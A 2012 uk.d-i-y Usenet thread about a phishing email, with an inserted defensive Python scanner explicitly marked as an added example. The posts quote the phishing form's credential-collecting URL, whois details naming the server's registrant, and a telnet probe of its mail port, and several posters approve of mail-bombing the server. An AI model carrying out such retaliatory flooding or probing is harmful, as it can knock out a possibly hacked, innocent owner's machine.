UK diy (uk.d-i-y): for the discussion of all topics related to diy (do-it-yourself) in the UK. All levels of experience and proficiency are welcome to join in to ask questions or offer solutions.
#1
Posted to uk.d-i-y
Idle fun for net hackers..

I got a phishing email today.

Told me to click on the HTML and sort out my bank. A bit of inspection of the attached code showed that it wanted me, using a direct copy of my bank's login page, to submit my details to a machine in Australia. Registered address was a Richard someone or other.

Armed with the IP address of said spammer's machine, I managed to ascertain it was running a mail system. Better still, it accepted mail to 'root@localhost' (most machines will). He has mail..

I do have under development on a centrally located server with gigabytes of bandwidth a mail client that will send mail to any IP address directly.. the thought of flooding his mailbox with 1000 mails a second appeals.. OTOH I may just register the IP address with spamhaus :-(
#2
Posted to uk.d-i-y
On Feb 23, 2:00 pm, The Natural Philosopher wrote:
> I got a phishing email today.
>
> Told me to click on the HTML and sort out my bank. A bit of inspection of the attached code showed that it wanted me, using a direct copy of my bank's login page, to submit my details to a machine in Australia. Registered address was a Richard someone or other.
>
> Armed with the IP address of said spammer's machine, I managed to ascertain it was running a mail system. Better still, it accepted mail to 'root@localhost' (most machines will). He has mail..
>
> I do have under development on a centrally located server with gigabytes of bandwidth a mail client that will send mail to any IP address directly.. the thought of flooding his mailbox with 1000 mails a second appeals.. OTOH I may just register the IP address with spamhaus :-(

was poor Richard directly responsible or had his domain been hacked by miscreants?

Jim K
#3
Posted to uk.d-i-y
On Feb 23, 2:13 pm, Jim K wrote:
> was poor Richard directly responsible or had his domain been hacked by miscreants?
>
> Jim K

If "poor Richard" has been hacked, receipt of 1000 mails a second might make him more careful with his system security in future.
#4
Posted to uk.d-i-y
On Feb 23, 3:01 pm, 82045 wrote:
> On Feb 23, 2:13 pm, Jim K wrote:
>> was poor Richard directly responsible or had his domain been hacked by miscreants?
>>
>> Jim K
> If "poor Richard" has been hacked, receipt of 1000 mails a second might make him more careful with his system security in future.

More likely poor Richard doesn't have a clue what's going on, and will simply have to abandon the email addy altogether.

NT
#5
Posted to uk.d-i-y
NT wrote:
> On Feb 23, 3:01 pm, 82045 wrote:
>> On Feb 23, 2:13 pm, Jim K wrote:
>>> was poor Richard directly responsible or had his domain been hacked by miscreants?
>>>
>>> Jim K
>> If "poor Richard" has been hacked, receipt of 1000 mails a second might make him more careful with his system security in future.
> More likely poor Richard doesn't have a clue what's going on, and will simply have to abandon the email addy altogether.

Dear boy, it was not an 'email addy', it was a physical Linux machine. And it was where, if I had been stupid enough to fall for the scam, the supplied form would have sent my bank account details and password.

Now Richard may be entirely innocent, but if he is, his machine is running a lot of code he doesn't know about, including a whole webserver and set of PHP scripts.

> NT
#6
Posted to uk.d-i-y
On 23/02/2012 15:53, NT wrote:
> More likely poor Richard doesn't have a clue what's going on, and will simply have to abandon the email addy altogether.

You may call him Richard, we'll just call him Dick.

Andy
#7
Posted to uk.d-i-y
On Feb 23, 8:46 pm, Andy Champ wrote:
> On 23/02/2012 15:53, NT wrote:
>> More likely poor Richard doesn't have a clue what's going on, and will simply have to abandon the email addy altogether.
> You may call him Richard, we'll just call him Dick.
>
> Andy

or Dick Unwittington perchance?

Jim K
#8
Posted to uk.d-i-y
Tim Streater wrote:
> In article , NT wrote:
>> On Feb 23, 3:01 pm, 82045 wrote:
>>> On Feb 23, 2:13 pm, Jim K wrote:
>>>> was poor Richard directly responsible or had his domain been hacked by miscreants?
>>> If "poor Richard" has been hacked, receipt of 1000 mails a second might make him more careful with his system security in future.
>> More likely poor Richard doesn't have a clue what's going on, and will simply have to abandon the email addy altogether.
> The OP said that Richard was running a mail server.

He was running a web server to gather phished data.

> In which case if he set that up, he should know better. If he didn't, and he's just a bot, then 1000 mails a second should fill his disk up PDQ and the machine will fall over.

Look, it seems that people don't actually understand this scam.

A letter arrives. It appears to come from - let's say -
One giveaway is it isn't addressed directly to you, by name.

It tells you to click on the attached html form and fill it out. This form takes 99% of your own bank's website, but with one crucial difference: instead of submitting the form to your bank, it submits it to the phishing web server.. I didn't try doing that to see what would happen. eg in it is this line

  <form name="form1" action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post">

At that point whatever you keyed in is now available to the phisher.

Anyway, I identified that server, and discovered it would accept emails.

  #whois drabcdfirstaid.com.au
  Domain Name: drabcdfirstaid.com.au
  Last Modified: 30-Aug-2011 10:55:39 UTC
  Registrar ID: NetRegistry
  Registrar Name: NetRegistry
  Status: ok
  Registrant: LLOYD, RICHARD MILES
  Eligibility Type: Sole Trader
  Eligibility ID: ABN 35521483210
  ......

so

  #telnet www.drabcdfirstaid.com.au 25
  Trying 64.251.30.196...
  Connected to drabcdfirstaid.com.au.
  Escape character is '^]'.
  220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)

tells me it's a Ubuntu machine running Postfix mail.

Now I know that if I carry on with this telnet into the SMTP port, it's very likely that root@localhost will be accepted as a direct recipient into the root user's mailbox. So I sent one. And it was.

The email came via an Oregon ISP. From a completely different source entirely.

Now it's possible, looking at the above, that poor old Richard doesn't know he has a nasty file stuffed in a hidden directory (.image) on his web server. OTOH I did not do anything nasty. He knows he's been violated at one level or another, so if he doesn't get down and check his server out, and see lots of unusual access, he's a first grade dope anyway.
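The mechanism described in the post above (an attached copy of the bank's login page whose form action points at a third party's server) is exactly what a recipient-side check can look for. The following is an added example, not code from the thread or from any of its posters: a small Python scanner that parses an HTML attachment, lists every form's action, and flags any form that would submit outside the domain the mail claims to come from, noting whether it carries a password field. The sample attachment is constructed; only the action URL is the one quoted in the post, and `bank.example` is a placeholder for the real bank's domain. It goes slightly beyond the post's case by also flagging relative actions, which for a file opened from disk would not reach the bank either.

```python
"""Flag HTML attachments whose forms submit somewhere other than the
purported sender's domain (added example, not from the thread)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a cut-down "bank login" attachment. The action URL
# is the one quoted in the thread; the rest of the markup is made up.
SAMPLE_ATTACHMENT = """
<html><body>
<form name="form1" action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post">
  <input type="text" name="userid">
  <input type="password" name="passcode">
  <input type="submit" value="Log in">
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Collect each <form>'s action/method and whether it has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def same_or_subdomain(host, trusted):
    """True if host is trusted itself or a subdomain of it (case-insensitive)."""
    host, trusted = host.lower(), trusted.lower()
    return host == trusted or host.endswith("." + trusted)


def find_suspicious_forms(html, trusted_domain):
    """Return details of every form that posts outside trusted_domain.

    A relative action (no host) is flagged too: an attachment opened from
    disk would submit it to file://, never to the bank.
    """
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        if not same_or_subdomain(host, trusted_domain):
            hits.append({"action": form["action"], "host": host,
                         "method": form["method"],
                         "has_password": form["has_password"]})
    return hits


if __name__ == "__main__":
    # bank.example stands in for the domain the mail claims to come from.
    for hit in find_suspicious_forms(SAMPLE_ATTACHMENT, "bank.example"):
        what = "credentials" if hit["has_password"] else "form data"
        print(f"{what} would be {hit['method'].upper()}ed to "
              f"{hit['host'] or '(relative URL)'}: {hit['action']}")
```

Run as-is it reports that credentials would be POSTed to www.drabcdfirstaid.com.au; the same check returns nothing when the trusted domain is set to the action's own domain, which is the point: the attachment is only "the bank's page" if its forms actually go to the bank.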
#9
Posted to uk.d-i-y
The Natural Philosopher:
> Tim Streater wrote:
>> In article oups.com, NT wrote:
>>> On Feb 23, 3:01 pm, 82045 wrote:
>>>> On Feb 23, 2:13 pm, Jim K wrote:
>>>>> was poor Richard directly responsible or had his domain been hacked by miscreants?
>>>> If "poor Richard" has been hacked, receipt of 1000 mails a second might make him more careful with his system security in future.
>>> More likely poor Richard doesn't have a clue what's going on, and will simply have to abandon the email addy altogether.
>> The OP said that Richard was running a mail server.
> He was running a web server to gather phished data.
>> In which case if he set that up, he should know better. If he didn't, and he's just a bot, then 1000 mails a second should fill his disk up PDQ and the machine will fall over.
> Look, it seems that people don't actually understand this scam.
>
> A letter arrives. It appears to come from - let's say - customer-
> One giveaway is it isn't addressed directly to you, by name.
>
> It tells you to click on the attached html form and fill it out.

Do I understand you correctly, that some e-mail clients will accept an HTML form and enable you to complete and submit it without it being displayed in your browser? That sounds scary. I ask because my mail client won't do anything like that, I'm sure.

-- 
Mike Barnes
#10
Posted to uk.d-i-y
"The Natural Philosopher" wrote in message ...

snip

> so
>
>   #telnet www.drabcdfirstaid.com.au 25
>   Trying 64.251.30.196...
>   Connected to drabcdfirstaid.com.au.
>   Escape character is '^]'.
>   220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)
>
> tells me it's a Ubuntu machine running Postfix mail.
>
> Now I know that if I carry on with this telnet into the SMTP port, it's very likely that root@localhost will be accepted as a direct recipient into the root user's mailbox. So I sent one. And it was.

snip

This tells me that you aren't in the habit of typing in SMTP at the keyboard, or you could have confirmed the acceptance of the 'root@localhost' address whilst connected to the server via Telnet. Then again, I'd have to refresh my memory of the RFCs before attempting it now :-)

Ah - rereading, it may well be that you did as I suggested instead of sending a separate email.

For those wondering if it was a mail address, a web server, whatever, a standard server install of Ubuntu can give you the whole nine yards in one go. Possibly the person who set up the system was focussed on installing the web server and hadn't realised he/she/it had also set up a working mail server by default. Then again all the incoming mail may be redirected to '/dev/null'.

Cheers

Dave R

-- 
No plan survives contact with the enemy. [Not even bunny]
Helmuth von Moltke the Elder

(\__/)
(='.'=)
(")_(")
#11
Posted to uk.d-i-y
82045 wrote:
> On Feb 23, 2:13 pm, Jim K wrote:
>> was poor Richard directly responsible or had his domain been hacked by miscreants?
>>
>> Jim K
> If "poor Richard" has been hacked, receipt of 1000 mails a second might make him more careful with his system security in future.

Precisely do.
#12
Posted to uk.d-i-y
Jim K wrote:
> On Feb 23, 2:00 pm, The Natural Philosopher wrote:
>> I got a phishing email today.
>>
>> Told me to click on the HTML and sort out my bank. A bit of inspection of the attached code showed that it wanted me, using a direct copy of my bank's login page, to submit my details to a machine in Australia. Registered address was a Richard someone or other.
>>
>> Armed with the IP address of said spammer's machine, I managed to ascertain it was running a mail system. Better still, it accepted mail to 'root@localhost' (most machines will). He has mail..
>>
>> I do have under development on a centrally located server with gigabytes of bandwidth a mail client that will send mail to any IP address directly.. the thought of flooding his mailbox with 1000 mails a second appeals.. OTOH I may just register the IP address with spamhaus :-(
> was poor Richard directly responsible or had his domain been hacked by miscreants?

well that's up to him to sort out. But the machine looked pretty tight to me.

> Jim K